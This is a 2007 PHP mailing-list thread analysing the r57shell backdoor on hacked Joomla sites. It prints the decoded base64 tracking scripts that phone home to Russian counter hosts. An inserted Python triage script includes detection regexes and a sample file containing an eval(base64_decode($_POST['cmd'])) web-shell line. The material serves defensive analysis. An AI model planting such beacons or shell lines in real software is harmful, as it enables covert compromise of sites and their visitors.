[nycphp-talk] [OT] XSS, Joomla & Remote Shells

Ben Sgro (ProjectSkyline) ben at projectskyline.com
Fri Jun 29 10:21:19 EDT 2007


Hello,

It's funny you mentioned this because I kinda assumed it might behave that 
way.

I've seen shellcode in the past that did things you didn't know about...

Great link, thanks!

I decided to see what was encoded in the $c1, $c2 variables,
which were base64 encoded strings. This is what they held:

<script 
language="javascript">hotlog_js="1.0";hotlog_r=""+Math.random()+"&s=81606&im=1&r="+escape(document.referrer)+"&pg="+escape(window.location.href);document.cookie="hotlog=1; 
path=/"; hotlog_r+="&c="+(document.cookie?"Y":"N");</script><script 
language="javascript1.1">hotlog_js="1.1";hotlog_r+="&j="+(navigator.javaEnabled()?"Y":"N")</script><script 
language="javascript1.2">hotlog_js="1.2";hotlog_r+="&wh="+screen.width+'x'+screen.height+"&px="+(((navigator.appName.substring(0,3)=="Mic"))?screen.colorDepth:screen.pixelDepth)</script><script 
language="javascript1.3">hotlog_js="1.3"</script><script 
language="javascript">hotlog_r+="&js="+hotlog_js;document.write("<a 
href='http://click.hotlog.ru/?81606' target='_top'><img "+" 
src='http://hit4.hotlog.ru/cgi-bin/hotlog/count?"+hotlog_r+"&' border=0 
width=1 height=1 alt=1></a>")</script><noscript><a 
href=http://click.hotlog.ru/?81606 
target=_top><img src="http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606&im=1" 
border=0 width="1" height="1" 
alt="HotLog"></a></noscript><Br><br><!--LiveInternet counter--><script 
language="JavaScript"><!--
document.write('<a href="http://www.liveinternet.ru/click" '+
'target=_blank><img src="http://counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';'+Math.random()+
'" alt="liveinternet.ru: показано число просмотров и посетителей за 24 часа" 
'+
'border=0 width=0 height=0></a>')//--></script><!--/LiveInternet-->

- Ben

Ben Sgro, Chief Engineer
ProjectSkyLine - Defining New Horizons

Our company: www.projectskyline.com
Our products: www.project-contact.com

This e-mail is confidential information intended only for the use of the 
individual to whom it is addressed.
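As an added example for this thread (not code from r57shell, and not anything Ben or inforequest posted), the Python triage script below does mechanically what Ben did by hand above: it finds base64 string literals assigned to PHP variables such as $c1 and $c2, decodes them, and lists the remote hosts the decoded content would contact, which is the "beacon" behaviour inforequest's reply describes. It also flags eval(base64_decode(...)), the construct that turns such a blob from a hidden tracking pixel into hidden code. It assumes the payloads sit in quoted string literals and that a beacon shows up as an http(s) URL in the decoded text; the sample PHP file, the shortened tracking HTML inside it, and the $c2 text are constructed for the example.

```python
"""Triage helper: decode base64 string literals in a PHP file and report the
remote hosts the decoded content would contact (a 'phone home' check).

Added example for this thread; not part of r57shell or anything posted by
the thread's participants. Assumptions (not confirmed by the thread): the
encoded payloads are assigned as quoted string literals ($name = "..."), and
a beacon appears as an http(s):// URL inside the decoded text.
"""
import base64
import binascii
import re
from typing import Dict, List

# A PHP variable assigned a quoted string made of base64 alphabet characters.
B64_ASSIGN_RE = re.compile(
    r'\$(?P<name>\w+)\s*=\s*(?P<q>["\'])(?P<blob>[A-Za-z0-9+/=\s]{20,})(?P=q)'
)
URL_RE = re.compile(r'https?://([A-Za-z0-9.-]+)', re.IGNORECASE)
# Runtime decoding of hidden code: what makes a blob dangerous rather than
# merely opaque. Optional gzinflate/gzuncompress/str_rot13 wrapper allowed.
EVAL_DECODE_RE = re.compile(
    r'eval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\(',
    re.IGNORECASE,
)


def decode_blobs(php_source: str) -> Dict[str, str]:
    """Return {variable_name: decoded_text} for every literal that decodes cleanly."""
    found: Dict[str, str] = {}
    for m in B64_ASSIGN_RE.finditer(php_source):
        blob = re.sub(r'\s+', '', m.group('blob'))  # tolerate mail-client wrapping
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        found[m.group('name')] = raw.decode('latin-1')  # keep every byte visible
    return found


def beacon_hosts(decoded: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each decoded variable to the distinct remote hosts it references."""
    out: Dict[str, List[str]] = {}
    for name, text in decoded.items():
        hosts = sorted({h.lower() for h in URL_RE.findall(text)})
        if hosts:
            out[name] = hosts
    return out


def uses_eval_decode(php_source: str) -> bool:
    """True if the file executes base64-decoded data at runtime."""
    return bool(EVAL_DECODE_RE.search(php_source))


def triage(php_source: str) -> dict:
    """One-shot report for a suspicious PHP file."""
    decoded = decode_blobs(php_source)
    return {
        'decoded_vars': sorted(decoded),
        'beacon_hosts': beacon_hosts(decoded),
        'eval_base64_decode': uses_eval_decode(php_source),
    }


# Constructed sample (not the real r57shell source): $c1 hides a tracking
# pixel modelled on, but much shorter than, the HTML Ben decoded above;
# $c2 holds harmless text so the report shows the difference.
_HIDDEN_HTML = (
    '<script>document.write("<img src=\'http://hit4.hotlog.ru/cgi-bin/hotlog/count?s=81606\' '
    'width=1 height=1>")</script>'
    '<img src="http://counter.yadro.ru/hit?t52.6" width=0 height=0>'
)
_C1 = base64.b64encode(_HIDDEN_HTML.encode()).decode()
_C2 = base64.b64encode(b'not a beacon, just text').decode()
SAMPLE_PHP = f'''<?php
$c1 = "{_C1}";
$c2 = "{_C2}";
echo base64_decode($c1);
eval(base64_decode($_POST["cmd"]));
'''

if __name__ == "__main__":
    report = triage(SAMPLE_PHP)
    for var, hosts in report['beacon_hosts'].items():
        print(f"${var} phones home to: {', '.join(hosts)}")
    print("eval(base64_decode(...)) present:", report['eval_base64_decode'])
```

Run it against a copy of the suspect file rather than on the compromised host itself; the point is that anything base64-encoded in a "tool" you did not write deserves decoding before you trust where it sends traffic.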

----- Original Message ----- 
From: "inforequest" <1j0lkq002 at sneakemail.com>
To: <talk at lists.nyphp.org>
Sent: Friday, June 29, 2007 3:18 AM
Subject: Re: [nycphp-talk] [OT] XSS, Joomla & Remote Shells


> Ben Sgro (ProjectSkyline) ben-at-projectskyline.com |nyphp dev/internal 
> group use| wrote:
>
>> Hello again,
>>  I've always had an interest in security. Not too long ago a friend was 
>> looking
>> into deploying joomla for a client. He's a pentester/researcher for a 
>> very well
>> educated and influential firm = ] , so he had to make sure it was going 
>> to be secure.
>>  He started researching and found that many joomla installs had/have been 
>> compromised
>> via XSS attacks.
>>  Today, he posted the link of a site that had been owned by XSS and the 
>> crackers installed this
>> web based backdoor script.
>>  I grabbed the script and included it here 
>> http://www.projectskyline.com/phplist/r57shell.txt to show PHP developers 
>> AGAIN how important security is and give us an inside look at
>> some of the tools our enemies are armed with.
>>  For those that deploy joomla, this is especially something to watch for.
>> For everyone else, just something to checkout.
>>  You'll notice this script enables:
>>  - Mail to be sent out (w/or w/out files attached)
>> - Commands to be run.
>> - Search for SUID, writable directories, files, tmp files, .(files) ...
>> - Outgoing connections to be established
>> - Some kind of IRC implementation
>> - SQL to be run
>> - Files can be downloaded and uploaded
>> - and much, much more.
>>  - Ben
>>
>
> Perhaps most interesting about that r57shell is that it quietly remotely 
> logs its own use. So in addition to the use as a backdoor shell script, it 
> becomes a beacon for compromised systems - the tool maker gets a notice of 
> every IP compromised by the tool when used by others.
>
> To quote full disclosure, "they [the script authors] can 0wn everything 
> you 0wned...Trust no one... write your own tools."
>
> http://seclists.org/fulldisclosure/2006/Sep/0083.html
>
>
>
>
>
>
> -- 
> -------------------------------------------------------------
> Your web server traffic log file is the most important source of web 
> business information available. Do you know where your logs are right now? 
> Do you know who else has access to your log files? When they were last 
> archived? Where those archives are? --John Andrews Competitive Webmaster 
> and SEO Blogging at http://www.johnon.com
>
> _______________________________________________
> New York PHP Community Talk Mailing List
> http://lists.nyphp.org/mailman/listinfo/talk
>
> NYPHPCon 2006 Presentations Online
> http://www.nyphpcon.com
>
> Show Your Participation in New York PHP
> http://www.nyphp.org/show_participation.php 
